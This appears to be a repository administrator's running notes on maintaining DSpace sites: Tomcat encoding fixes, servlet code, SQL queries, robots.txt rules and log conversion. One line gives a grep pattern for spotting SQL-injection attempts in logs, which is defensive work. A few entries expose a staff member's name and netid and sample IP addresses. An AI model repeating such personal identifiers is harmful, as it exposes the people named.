In general, this is rather difficult, because a lot depends on the accuracy with which your papers are referenced by others. However, if you have separate web pages for each of your papers, then Google Scholar advises that you can add several meta tags to your pages to help Google's crawler to list your paper. In particular, they recommend using the following tags (replace the content="..." bits with your own information):

<meta name="citation_journal_title" content="Journal Name">
<meta name="citation_authors" content="Last Name1, First Name1; Last Name2, First Name2">
<meta name="citation_title" content="Article Title">
<meta name="citation_date" content="01/01/2007">
<meta name="citation_volume" content="10">
<meta name="citation_issue" content="1">
<meta name="citation_firstpage" content="1">
<meta name="citation_lastpage" content="15">
<meta name="citation_doi" content="10.1074/jbc.M309524200">
<meta name="citation_pdf_url" content="http://www.publishername.org/10/1/1.pdf">
<meta name="citation_abstract_html_url" content="http://www.publishername.org/cgi/content/abstract/10/1/1">
<meta name="citation_fulltext_html_url" content="http://www.publishername.org/cgi/content/full/10/1/1">
<meta name="dc.Contributor" content="Last Name1, First Name1">
<meta name="dc.Contributor" content="Last Name2, First Name2">
<meta name="dc.Title" content="Article Title">
<meta name="dc.Date" content="01/01/2007">
<meta name="citation_publisher" content="Publisher Name">
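
A minimal sketch of how an item page could emit a few of these tags from metadata it already holds. The tag names are the ones quoted above. The class and method names are hypothetical, and this is not how DSPACE itself renders item pages. The content is escaped so that a title containing a quote or an ampersand does not break the HTML.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Hypothetical helper, not DSpace code: builds Google Scholar style meta tags.
class ScholarMetaTags {

    /** Escapes the characters that are unsafe inside an HTML attribute value. */
    static String escape(String s) {
        return s.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("\"", "&quot;");
    }

    static String meta(String name, String content) {
        return "<meta name=\"" + name + "\" content=\"" + escape(content) + "\">";
    }

    /** Authors are joined with "; " as in the citation_authors example above. */
    static List<String> tagsFor(String title, List<String> authors, String date, String pdfUrl) {
        List<String> tags = new ArrayList<String>();
        tags.add(meta("citation_title", title));
        tags.add(meta("citation_authors", String.join("; ", authors)));
        tags.add(meta("citation_date", date));
        tags.add(meta("citation_pdf_url", pdfUrl));
        return tags;
    }

    public static void main(String[] args) {
        List<String> authors = Arrays.asList("Last Name1, First Name1", "Last Name2, First Name2");
        for (String tag : tagsFor("Article Title", authors, "01/01/2007",
                                  "http://www.publishername.org/10/1/1.pdf")) {
            System.out.println(tag);
        }
    }
}
```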

December 8, 2009

Config file change to make DSPACE properly handle unicode filenames

On strip1 the AgEcon instance was not properly downloading files that had non-ascii file names. That is it was not handling unicode characters correctly. This was corrected by fixing a config file.

File to edit on strip1:
tu nano tomcat/conf/server.xml

Old bad line:
<!-- Define an AJP 1.3 Connector on port 8009 -->
<Connector port="8009" UIEncoding="UTF-8" tomcatAuthentication="false" enableLookups="false" redirectPort="8443" protocol="AJP/1.3" />

New fixed line:
<!-- Define an AJP 1.3 Connector on port 8009 -->
<Connector port="8009" URIEncoding="UTF-8" tomcatAuthentication="false" enableLookups="false" redirectPort="8443" protocol="AJP/1.3" />

i.e. change UIEncoding to URIEncoding

Things learned along the way:
1) Location of constant to encode strings as UTF-8 in DSPACE
./src/org/dspace/core/Constants.java:209: public static final String DEFAULT_ENCODING = "UTF-8";
2) Servlet that does downloads of pdf's (line 165 of ./etc/dspace-web.xml):
<servlet>
  <servlet-name>bitstream</servlet-name>
  <servlet-class>org.dspace.app.webui.servlet.BitstreamServlet</servlet-class>
</servlet>
3) Code from ./src/org/dspace/app/webui/servlet/BitstreamServlet.java that does the download (the System.out.println lines are debugging output added along the way):

    protected void doDSGet(Context context, HttpServletRequest request,
            HttpServletResponse response) throws ServletException, IOException,
            SQLException, AuthorizeException
    {
        Item item = null;
        Bitstream bitstream = null;
        System.out.println("In dspace proper");

        // Get the ID from the URL
        String idString = request.getPathInfo();
        String handle = "";
        String sequenceText = "";
        String filename = null;
        int sequenceID;
        System.out.println("1 idString " + idString );

        // Parse 'identifier' and 'sequence' (bitstream seq. number) out
        // of remaining URL path, which is typically of the format:
        // {identifier}/{sequence}/{bitstream-name}
        // But since the bitstream name MAY have any number of "/"s in
        // it, we scan from the start to pick out the sequence:
        String [] pathArray = HandleManager.splitIdentifier(idString);
        handle = pathArray[0];
        System.out.println("1.5 handle " + handle );
        String extraInfo = pathArray[1];
        System.out.println("2 extraInfo " + extraInfo );

        if(extraInfo != null)
        {
            // Remove leading slash if any:
            if(extraInfo.startsWith("/"))
            {
                extraInfo = extraInfo.substring(1);
            }

            // The sequence is before the first slash, everything
            // else is part of the bitstream-name.
            int slashIndex = extraInfo.indexOf('/');
            if(slashIndex != -1)
            {
                sequenceText = extraInfo.substring(0,slashIndex);
                filename = extraInfo.substring(slashIndex+1);
            }
        }
        System.out.println("3 sequenceText " + sequenceText );

        try
        {
            sequenceID = Integer.parseInt(sequenceText);
            System.out.println("4 sequenceID " + sequenceID );
        }
        catch (NumberFormatException nfe)
        {
            sequenceID = -1;
        }

        // Now try and retrieve the item
        DSpaceObject dso = HandleManager.resolveToObject(context, handle);

        // Make sure we have valid item and sequence number
        if (dso != null && dso.getType() == Constants.ITEM && sequenceID >= 0)
        {
            item = (Item) dso;

            if (item.isWithdrawn())
            {
                log.info(LogManager.getHeader(context, "view_bitstream",
                        "handle=" + handle + ",withdrawn=true"));
                JSPManager.showJSP(request, response, "/tombstone.jsp");
                return;
            }

            boolean found = false;
            Bundle[] bundles = item.getBundles();

            for (int i = 0; (i < bundles.length) && !found; i++)
            {
                Bitstream[] bitstreams = bundles[i].getBitstreams();

                for (int k = 0; (k < bitstreams.length) && !found; k++)
                {
                    if (sequenceID == bitstreams[k].getSequenceID())
                    {
                        bitstream = bitstreams[k];
                        found = true;
                    }
                }
            }
        }

        if (bitstream == null || filename == null
                || !filename.equals(bitstream.getName()))
        {
            // No bitstream found or filename was wrong -- ID invalid
            log.info(LogManager.getHeader(context, "invalid_id", "path=" + idString));
            JSPManager.showInvalidIDError(request, response, idString,
                    Constants.BITSTREAM);
            return;
        }

        // log.fatal(LogManager.getHeader(context, "view_bitstream",
        //         "bitstream_id=" + bitstream.getID()));

        // Modification date
        // TODO: Currently the date of the item, since we don't have dates
        // for files
        response.setDateHeader("Last-Modified", item.getLastModified().getTime());

        // Check for if-modified-since header
        long modSince = request.getDateHeader("If-Modified-Since");

        if (modSince != -1 && item.getLastModified().getTime() < modSince)
        {
            // Item has not been modified since requested date,
            // hence bitstream has not; return 304
            response.setStatus(HttpServletResponse.SC_NOT_MODIFIED);
            return;
        }

        // Pipe the bits
        InputStream is = bitstream.retrieve();

        // Set the response MIME type
        response.setContentType(bitstream.getFormat().getMIMEType());

        // Response length
        response.setHeader("Content-Length", String.valueOf(bitstream.getSize()));

        Utils.bufferedCopy(is, response.getOutputStream());
        is.close();
        response.getOutputStream().flush();
    }

4) html generated for download before the fix:
<tr><td headers="t1" class="standard">12_Felföldi_Apstract.pdf</td><td headers="t2" class="standard"></td><td headers="t3" class="standard">77Kb</td><td headers="t4" class="standard">PDF</td><td class="standard" align="center"><a target="_blank" href="/bitstream/55410/3/12_Felf%c3%b6ldi_Apstract.pdf">View/Open</a></td></tr>
note 12_Felföldi_Apstract.pdf != 12_Felf%c3%b6ldi_Apstract.pdf
5) class (a JSP tag) that generates the above html is: ./src/org/dspace/app/webui/jsptag/ItemTag.java
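
The mismatch in item 4 can be reproduced outside of Tomcat. The sketch below decodes the percent-encoded file name from the link twice, once as UTF-8 and once as ISO-8859-1, which was the default Tomcat used for request URIs when URIEncoding was not set. Only the UTF-8 result equals the stored bitstream name, which is what the filename.equals(bitstream.getName()) test in the servlet needs. URLDecoder is used here only as a stand-in for Tomcat's own decoding (it also turns "+" into a space, which path decoding does not), and the class name is hypothetical.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;

// Hypothetical demo class: shows why the connector needs URIEncoding="UTF-8".
class UriEncodingDemo {

    /** Decodes a percent-encoded path segment using the given charset name. */
    static String decode(String pathSegment, String charset) {
        try {
            return URLDecoder.decode(pathSegment, charset);
        } catch (UnsupportedEncodingException e) {
            throw new IllegalArgumentException("Unknown charset: " + charset, e);
        }
    }

    public static void main(String[] args) {
        String fromLink = "12_Felf%c3%b6ldi_Apstract.pdf";
        String stored = "12_Felf\u00f6ldi_Apstract.pdf"; // name held by the bitstream

        String asUtf8 = decode(fromLink, "UTF-8");
        String asLatin1 = decode(fromLink, "ISO-8859-1");

        System.out.println("UTF-8 matches stored name:      " + stored.equals(asUtf8));
        System.out.println("ISO-8859-1 matches stored name: " + stored.equals(asLatin1));
    }
}
```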

November 3, 2009

DC Metadata fields used by UMN DSPACE instances:

dc.title
dc.title.alternative
dc.contributor.author
dc.contributor.editor
dc.subject
dc.subject.other
dc.date.issued
dc.identifier.citation
dc.relation.ispartofseries
dc.description.abstract
dc.description
dc.identifier.govdoc
dc.identifier.uri
dc.identifier.isbn
dc.identifier.issn
dc.identifier.ismn
dc.identifier
dc.relation
dc.format.extent
dc.language
dc.extent

September 15, 2009

dspace batch ingest

Format of files to ingest

Here is a breakdown of the files:

batch_files - top level directory (name does not matter)
   |
   Ingest1 - This is a prototype for the directories that you will create. Give these directories any name you want.
      |
      contents - contains the asset name. The fields are separated by a single tab. This file must be called "contents".
      dublin_core.xml - contains the DC metadata. This file must be called "dublin_core.xml".
      UDCsubmissionguidelines.pdf - This is the asset. You may use whatever name you want. However, the name of the asset must appear in the "contents" file.
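
The layout rules above can be checked before running the import. The class below is a minimal sketch and not part of DSpace: IngestDirCheck and its messages are hypothetical names, and it assumes the asset name is the first tab-separated field on each line of "contents".

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper (not part of DSpace): checks one item directory before ingest.
class IngestDirCheck {
    // Returns a list of problems found; an empty list means the layout looks usable.
    static List<String> problems(Path itemDir) {
        List<String> problems = new ArrayList<>();
        if (!Files.isRegularFile(itemDir.resolve("dublin_core.xml"))) {
            problems.add("missing dublin_core.xml");
        }
        Path contents = itemDir.resolve("contents");
        if (!Files.isRegularFile(contents)) {
            problems.add("missing contents");
            return problems;
        }
        try {
            for (String line : Files.readAllLines(contents)) {
                if (line.trim().isEmpty()) {
                    continue; // skip blank lines
                }
                // Assumption: the asset name is the first tab-separated field.
                String asset = line.split("\t")[0].trim();
                if (!Files.isRegularFile(itemDir.resolve(asset))) {
                    problems.add("missing asset: " + asset);
                }
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return problems;
    }
}
```

Calling IngestDirCheck.problems on each directory under batch_files (Ingest1 and its siblings) before the import gives a quick list of directories that still need fixing.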

tarball that gives working sample of the directory structure.

command

/dspace/dspace-ir/bin$ ./dsrun org.dspace.app.itemimport.ItemImport -a -c CollectionHandle -e Eperson -s /PATH_TO_BATCH_FILES/batch_files -m /home//PATH_TO_BATCH_FILESs/Ingest1/mapfile.txt

Resources

Dorothea Salo's EXCELLENT blog
ingest-export.ppt ARD Prasad
ScalabilityIssues - DSpace Wikis

September 14, 2009

putting captchas into dspace using jcaptcha

ingest-export.ppt

code needed for a captcha

The file form.jsp had to be modified so that the email form is not produced if the captcha is not set or is not correct.
When the email form is not shown, a jsp that produces the captcha is called instead: captcha_main.jsp. To make the captcha image, captcha_main.jsp calls the following java classes, in order:
ImageCaptchaServlet.java
CaptchaServiceSingleton.java
MyImageCaptchaEngine.java
Also the file dspace-web.xml had to be modified.

X11 not on the box where tomcat runs

If X11 is not installed on the box where tomcat runs, you will get an error like "port 6000 not available". To fix this put:

-Djava.awt.headless=true

into the catalina.sh file.

Helpful links

How to use jsp-forward tag
How do I perform browser redirection from a JSP pages
Breaking a Visual CAPTCHA

August 31, 2009

Error in DSPACE search ... handles from index not having items

Symptom

Hi, I was checking abstracts for Volume 41 No. 2 of Journal of Agricultural and Applied Economics. When I searched on "Race, Gender, School . . ." I got an error message saying that the website had experienced an internal error and I tried it again w/ the same results. Since the same message requested letting you know of the problem I am responding. Sincerely,

Error Message

Trying the search above generated the error message:

An internal server error occurred on http://ageconsearch.umn.edu:
Date: 8/28/09 10:59 AM
Session ID: 6AAEA1B2D8AADD0C7F1BE28731AE9083
-- URL Was: http://ageconsearch.umn.edu/simple-search?sort=date&query=%28%28keyword%3Arace%29%29&from_advanced=true&query2=&field1=keyword&conjunction2=AND&query1=race+&field2=keyword&query3=&conjunction1=AND&field3=ANY&SortDirection=descending
-- Method: GET
-- Parameters were:
-- field3: "ANY"
-- field2: "keyword"
-- field1: "keyword"
-- sort: "date"
-- query3: ""
-- query2: ""
-- SortDirection: "descending"
-- query1: "race "
-- query: "((keyword:race))"
-- from_advanced: "true"
-- conjunction2: "AND"
-- conjunction1: "AND"

Exception:
java.sql.SQLException: Query "((keyword:race))" returned unresolvable handle: 53087
        at org.dspace.app.webui.servlet.SimpleSearchServlet.doDSGet(SimpleSearchServlet.java:271)
        at org.dspace.app.webui.servlet.DSpaceServlet.processRequest(DSpaceServlet.java:151)
        at org.dspace.app.webui.servlet.DSpaceServlet.doGet(DSpaceServlet.java:99)
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:689)
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:802)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:252)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:173)
        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213)
        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:178)
        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:126)
        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:105)
        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:107)
        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:148)
        at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:199)
        at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:282)
        at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:767)
        at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:697)
        at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:889)
        at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:684)
        at java.lang.Thread.run(Thread.java:595)

Outline of Solution

1) Search found a handle that was not in the database (probably a deleted file, with IndexAll not yet run).
2) I found the segment of code that collects into a list all the items found by search.
3) Whenever a word from this deleted record was entered, the search routine would throw an error and halt.
4) I rewrote the code to ignore handles that are not in the database.
5) Ran a few basic tests on Odin (our private DSPACE setup).
6) Deployed it to strip1 (production site).

Modified Code

// FROM SimpleSearchServlet.java
/*
resultsItems = new Item[numItems];
for (int i = 0; i < numItems; i++)
{
    String myhandle = (String) itemHandles.get(i);
    Object o = HandleManager.resolveToObject(context, myhandle);
    resultsItems[i] = (Item) o;
    if (resultsItems[i] == null)
    {
        throw new SQLException("Query \"" + query
                + "\" returned unresolvable handle: " + myhandle);
    }
}
*/

// The code below will only add handles to the list if a well defined
// item is associated with it.
Item[] resultsItems_temp = new Item[numItems];
int item_count = 0;
for (int i = 0; i < numItems; i++)
{
    String myhandle = (String) itemHandles.get(i);
    Object o = HandleManager.resolveToObject(context, myhandle);
    if (o != null)
    {
        resultsItems_temp[item_count] = (Item) o;
        item_count++;
    }
}

resultsItems = new Item[item_count];
for (int i = 0; i < item_count; i++)
{
    resultsItems[i] = resultsItems_temp[i];
}
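
The same idea (skip any handle that does not resolve) can be sketched without the temporary array. This is only an illustration in current Java, not the code that was deployed: ResolvableFilter is a hypothetical name, and the resolver argument stands in for HandleManager.resolveToObject so the sketch runs on its own.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.function.Function;

// Hypothetical stand-alone illustration; the resolver plays the role of
// HandleManager.resolveToObject(context, handle) in the servlet.
class ResolvableFilter {
    // Keeps only the objects the resolver can find; unresolvable handles are skipped.
    static <T> List<T> resolveAll(List<String> handles, Function<String, T> resolver) {
        List<T> resolved = new ArrayList<>();
        for (String handle : handles) {
            T item = resolver.apply(handle);
            if (item != null) {
                resolved.add(item);
            }
        }
        return resolved;
    }
}
```

Because the list grows only when a handle resolves, there is no need to count the good entries first and copy them into a second array.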

August 7, 2009

Problem with a dspace user and solution

Problem


This is a problem that has happened once before. Although Erin George has successfully uploaded files to some of the collections in the University Archives community, she is now in a cycle where she logs in, goes to a collection, and whatever she does gets cycled back to the login screen with her x500 there but no password. She enters her password, and goes through the same thing again and again. This also happened to one of our students.

Solution

This command fixed it:
update eperson set netid = 'georg038' where eperson_id = '190';

June 26, 2009

changing feedback email in dspace

The code for creating an email for feedback in dspace only allows 1 recipient:

Email email = ConfigurationManager.getEmail("feedback");
email.addRecipient(ConfigurationManager.getProperty("feedback.recipient"));

While the email for admin allows a comma separated list of recipients:

String AdminEmail = ConfigurationManager.getProperty("admin.emails");
String EmailsAddresses[] = AdminEmail.split(",");
for (int i = 0; i < EmailsAddresses.length ; i++)
{
    email.addRecipient(EmailsAddresses[i]);
}

I took parts of the admin code and applied it to the feedback part of dspace. Now feedback email supports a comma separated list of email recipients.
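
One thing a plain split(",") does not handle is whitespace around the commas or an empty entry. A minimal sketch of a more forgiving parser is below; RecipientList is a hypothetical helper, not DSpace code, and the property value would come from ConfigurationManager.getProperty("feedback.recipient") as in the lines above.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper: turns a comma separated property value into clean addresses.
class RecipientList {
    static List<String> parse(String property) {
        List<String> addresses = new ArrayList<>();
        if (property == null) {
            return addresses; // property not set in dspace.cfg
        }
        for (String part : property.split(",")) {
            String address = part.trim();
            if (!address.isEmpty()) {
                addresses.add(address); // skip blanks left by stray commas
            }
        }
        return addresses;
    }
}
```

Each entry of the returned list can then be passed to email.addRecipient in a loop.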

June 12, 2009

SQL to get number of new items in DSPACE after a certain date

select count(date_accessioned) from ItemsByDateAccessioned where date_accessioned > '2008-07-01'::DATE ;

June 2, 2009

Looking for non unicode characters in AgEcon metadata

Problem and general solution

Some non-Unicode characters have gotten into the dspace metadata. We need to find them. I will print out the metadata fields to a file of the form below:

<doc> text from metadata pull </doc>

Then I will run the file through xmllint.
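
As a possible complement to xmllint, the metadata text can also be checked in Java once it has been read into a String. The sketch below is an assumption about what "bad" means here: it flags any character outside the set that XML 1.0 allows (tab, line feed, carriage return, and the ranges 0x20-0xD7FF, 0xE000-0xFFFD, 0x10000-0x10FFFF). XmlCharCheck is a hypothetical name.

```java
// Hypothetical helper: finds characters that XML 1.0 does not allow in a document.
class XmlCharCheck {
    // True if the code point is in the XML 1.0 "Char" production.
    static boolean isXmlChar(int cp) {
        return cp == 0x9 || cp == 0xA || cp == 0xD
                || (cp >= 0x20 && cp <= 0xD7FF)
                || (cp >= 0xE000 && cp <= 0xFFFD)
                || (cp >= 0x10000 && cp <= 0x10FFFF);
    }

    // Returns the index of the first illegal character, or -1 if the text is clean.
    static int firstIllegalIndex(String text) {
        for (int i = 0; i < text.length(); ) {
            int cp = text.codePointAt(i);
            if (!isXmlChar(cp)) {
                return i;
            }
            i += Character.charCount(cp); // step over surrogate pairs as one character
        }
        return -1;
    }
}
```

This only catches illegal characters after decoding. Bytes that are not valid in the database encoding at all would still need a byte-level check such as the xmllint run.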

sql needed

The line below will get all the valid item_ids.
SELECT item.item_id from item, handle where handle.resource_id=item.item_id;

The line below will pull a metadata field for a given item id.
select text_value from metadatavalue where metadata_field_id=43 AND item_id=36450;
For this query, the Series/Report will be obtained for an item with item_id=36450.

Metadata fields to check

metadata_field_id name
3 author
15 date issued
25 uri
27 abstract
40 Institution/Association
43 Series/Report
57 Keyword
63 JEL Codes
64 Title
67 email
This list came from AgEconMetadata.htm

May 24, 2009

Memory Leak in DSPACE

There is a memory leak in DSPACE.
I have tried:
1) Making a more strict robots.txt file:

User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-title
Disallow: /browse-date
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author
Disallow: /*/browse-title
Disallow: /*/browse-date
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search

This change (especially the Disallow: /feed ) seems to have reduced cpu load, but the leak is still there.
2) A user group suggested shutting off the string cache. I tried this but it did not seem to help.
3) Also, a site suggests that there is a memory leak in tomcat 5.x and recommends upgrading to tomcat 6.x. I haven't done this yet.
4) I will need to look in detail at output from hmap to determine where the trouble is. It is likely within the dspace app.

Install AgEcon on strip1

Install script for AgEcon on strip1

I wrote a shell script called deployAgEcon.sh. This has all the steps required to install a new version of AgEcon on strip1.

dspace.cfg config file

All information related to installing dspace on a given box is stored in the config file dspace.cfg. Below are versions for various boxes for both UDC and AgEcon: UDC on strip1
AgEcon on strip1
UDC on odin (silvi003 account)
AgEcon on odin (silvi003 account)

May 13, 2009

Eric Moore's Comments on the UDC Indexer

Eric Moore wrote a great explanation of the fields that are indexed in UDC.

May 8, 2009

New robots.txt file for dspace

I am going to use the robots.txt file below. It is based on information from the dspace wiki:

User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-title
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author

The "/suggest" corresponds to a page that sends an email to a friend.

March 9, 2009

sql for rollup stats in the dspace database

A) Find all the item handles that belong to a community with a community id of 4

SELECT handle.handle FROM community2item, handle WHERE community2item.item_id = handle.resource_id AND handle.resource_type_id = 2 AND community2item.community_id = 4

B) Turning a community handle into a resource id (community id)

SELECT handle.resource_id FROM handle WHERE handle=125 AND resource_type_id=4;

resource_id
-------------
4
Note: resource_type_id=4 means community.

C) Substitute B into A -> Item handles in terms of community handle

SELECT count (handle) FROM community2item, handle WHERE community2item.item_id = handle.resource_id AND handle.resource_type_id = 2 AND community2item.community_id = (SELECT handle.resource_id FROM handle WHERE handle=125 AND resource_type_id=4);

Note: resource_type_id=2 means item.

February 25, 2009

Dspace Handles collections with problems

Summary

In UDC there are Dspace Handles that are collections(resource_type_id =3) but do not show up in the collections table.

Finding the problem in the media filter log

I was looking at the filter media log, dspace-ir_filter-media.log, and found many errors of the form:

Exception in thread "main" java.lang.IllegalArgumentException: Cannot resolve 4394 to a DSpace object

This means that when the handle was passed to the static method HandleManager.resolveToObject, the result was null.

A list (handle set 1) of these handles was obtained using the UNIX command line below:

grep 'Cannot.resolve' dspace-ir_filter-media.log | perl -pe 's/^.*Cannot resolve (\d+).*$/$1/' | sort | uniq | sort -g

Look at handles that produce error inside of Postgres

One can go to the handle table and get the resource_id for one of the handles on the list. Using this resource_id, no entry can be found in the collection table. I think these are collections that were deleted. They were removed from the collection table but not from the handle table.

sql to get collection handles

old sql command ... pulls handles that have null and valid values in the collection table

The handles that were input to filter-media came from the sql cmd below:

SELECT handle FROM handle WHERE resource_type_id=3;

The above command will grab both good collection handles and handles that have no entry in the collection table.
Handles obtained with this command (good and bad collection handles combined): handle set 2.

new sql command only pulls handles that have valid values in the collection table

The command below will only pull handles that have valid collection_ids (i.e. exist in the collection table).

SELECT handle FROM collection, handle WHERE collection_id=resource_id AND resource_type_id=3 ORDER BY handle::text::integer;

Handles obtained with the improved command (only handles that exist in the collection table): handle set 3.

Quick sanity check

handle set 1 maps to null collections.
handle set 2 maps to all collections in the handle table both null and non-null.
handle set 3 maps to non-null collections

So we would expect:
1) There to be no overlap between handle set 1 and handle set 3.
2) The combined contents of handle set 1 and handle set 3 should be equal to the contents of handle set 2.
Both 1 and 2 are correct.
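
The two expectations can also be checked mechanically once the three handle lists are loaded into sets. The sketch below is only an illustration: HandleSetCheck is a hypothetical name, and how the sets are loaded (from the grep output and the two sql commands) is left out.

```java
import java.util.Collections;
import java.util.Set;
import java.util.TreeSet;

// Hypothetical helper: verifies the two expectations for the three handle sets.
class HandleSetCheck {
    // set1 = handles that resolve to null, set2 = all collection handles,
    // set3 = handles that exist in the collection table.
    static boolean isConsistent(Set<Integer> set1, Set<Integer> set2, Set<Integer> set3) {
        // 1) no overlap between handle set 1 and handle set 3
        boolean noOverlap = Collections.disjoint(set1, set3);
        // 2) set 1 and set 3 combined equal set 2
        Set<Integer> combined = new TreeSet<>(set1);
        combined.addAll(set3);
        return noOverlap && combined.equals(set2);
    }
}
```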

February 13, 2009

java code in dspace to get collections an item belongs to

From Item.java we find:

TableRowIterator tri = DatabaseManager.queryTable(ourContext, "collection",
        "SELECT collection.* FROM collection, collection2item WHERE " +
        "collection2item.collection_id=collection.collection_id AND " +
        "collection2item.item_id= ? ",
        itemRow.getIntColumn("item_id"));

October 14, 2008

Test media filter ... DSPACE UDC side

This media should be filtered:

http://purl.umn.edu/5842

Keywords:

Austin Catholic November physician

October 9, 2008

Check that handle.resource_id=item.item_id

The command:
SELECT handle.* from item, handle where handle.resource_id=item.item_id and handle = 2204;
yields:
handle_id handle resource_type_id resource_id
5 2204 2 2
The command:
SELECT item.* from item, handle where handle.resource_id=item.item_id and handle = 2204;
yields:
item_id submitter_id in_archive withdrawn last_modified owning_collection
2 1 t f 2007-12-13 16:53:15.767-06 1
Finally the command:
select * from itemsbytitle where item_id=2;
yields:
items_by_title_id item_id title sort_title
3727 2 xponentially growing solutions for inverse problems in PDE xponentially growing solutions for inverse problems in pde


All of this implies that the URL:
https://odin.lib.umn.edu:9031/dspace-ir/handle/2204
Will resolve to a record with the title:
xponentially growing solutions for inverse problems in PDE
This is what happens.

October 4, 2008

part of regex to find sql attacks

| grep 'DECLARE.*CHAR.*SET.*CAST' |

sql cmd for dspace

Insert dspace type logs into the University of Minho stats addon

INSERT INTO stats.log (date, logger, priority, message) VALUES
('2008-09-19 11:45:22,672', 'org.dspace.app.webui.servlet.DSpaceServlet', 'INFO',
'anonymous:session_id=85E693CBBCBD74DB561B2D2DBEDD0E2B:ip_addr=128.101.29.84:
view_item:handle=2854');

Find the delta t for an item that has a handle 7113

select ('2008-03-07 21:44:01.797-06' - (select item.last_modified from item, handle where handle.resource_id=item.item_id and handle=7113));

Find handles that have been modified since epoch 1197586394

SELECT handle, EXTRACT(EPOCH FROM item.last_modified) from item, handle where handle.resource_id=item.item_id and EXTRACT(EPOCH FROM item.last_modified) > 1197586394 order by handle;
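
To read an epoch value like the one above next to the last_modified timestamps in the item table, it can be converted back to a date. A minimal sketch using java.time follows; EpochCheck is a hypothetical name, and the -6 hour offset is taken from the "-06" suffix on the timestamps shown in these notes.

```java
import java.time.Instant;
import java.time.ZoneOffset;

// Hypothetical helper: renders epoch seconds as ISO-8601 timestamps.
class EpochCheck {
    // Epoch seconds as a UTC timestamp.
    static String toUtc(long epochSeconds) {
        return Instant.ofEpochSecond(epochSeconds).toString();
    }

    // Epoch seconds at a fixed offset from UTC, e.g. -6 for the "-06" in the item table.
    static String toOffset(long epochSeconds, int offsetHours) {
        return Instant.ofEpochSecond(epochSeconds)
                .atOffset(ZoneOffset.ofHours(offsetHours))
                .toString();
    }
}
```

For example, EpochCheck.toOffset(1197586394L, -6) gives 2007-12-13T16:53:14-06:00.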

Bitstream from handle

select bundle2bitstream.bitstream_id from item2bundle, handle, bundle2bitstream where (handle.handle=31045 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id);
bitstream_id
--------------
3976

handle from Bitstream

dspace_sr=> select handle.handle from item2bundle, handle, bundle2bitstream where (bundle2bitstream.bitstream_id=3976 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id);
handle
--------
31045
(1 row)

Collections that are children of a given community

SELECT handle FROM community2collection, handle WHERE community2collection.collection_id = handle.resource_id AND handle.resource_type_id = 3 AND community2collection.community_id = (SELECT resource_id FROM handle WHERE resource_type_id=4 AND handle=1);

communities that are children of a given community

SELECT handle FROM community2community, handle WHERE community2community.child_comm_id = handle.resource_id AND handle.resource_type_id = 4 AND community2community.parent_comm_id = (SELECT resource_id FROM handle WHERE resource_type_id=4 AND handle=1);

some ips that wormly uses

We are using wormly to monitor our dspace instances. The apache logs give a few ips that wormly uses

apache_pattern_ip.pl -d -r '\"-\" \"\"' ageconsearch_access.log_2008-09-21
72.51.35.173 node-x2j54.wormly.com.
69.60.118.203 node-sp711.wormly.com.
125.214.66.62 node-aux9e3.wormly.com.
81.171.111.142 node4.wormly.com.
66.228.123.50 clover.wormly.com.
207.210.96.85 node3.wormly.com.


Note the perl script apache_pattern_ip.pl gives the ips of all the log entries that match the given regex.

September 30, 2008

Translating apache log format to dspace

Introduction

There are basically two types of log files that must be handled: views and downloads.

Downloads

Comparison of apache and dspace logs

From apache logs:
69.109.228.170 - - [21/Sep/2008:23:59:27 -0500] "GET /bitstream/31045/1/26020387.pdf HTTP/1.1" 200 1225483 "http://scholar.google.com/scholar?hl=en&lr=&q=accept+Genetically+modified+organism&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"

When the guts of this request are sent to agecon by entering the line below into a browser:

http://ageconsearch.umn.edu/bitstream/31045/1/26020387.pdf

Catalina records the following log entry:

2008-09-30 16:12:08,153 INFO org.dspace.app.webui.servlet.BitstreamServlet @ anonymous:session_id=F82A25EDFCF0C73AE8C19291D3C3985A:ip_addr=128.101.29.84:view_bitstream:bitstream_id=3976


Required conversions

Notice that in the two log entries above, apache records a handle of 31045, while the dspace log gives a bitstream_id of 3976. To convert from apache to dspace, we must map the handle to the bitstream_id. The sql command below will do this:

select bundle2bitstream.bitstream_id from item2bundle, handle, bundle2bitstream where (handle.handle=31045 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id); bitstream_id
bundle_id
-----------
3976
Note the bundle_id and the bitstream_id are the same.
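
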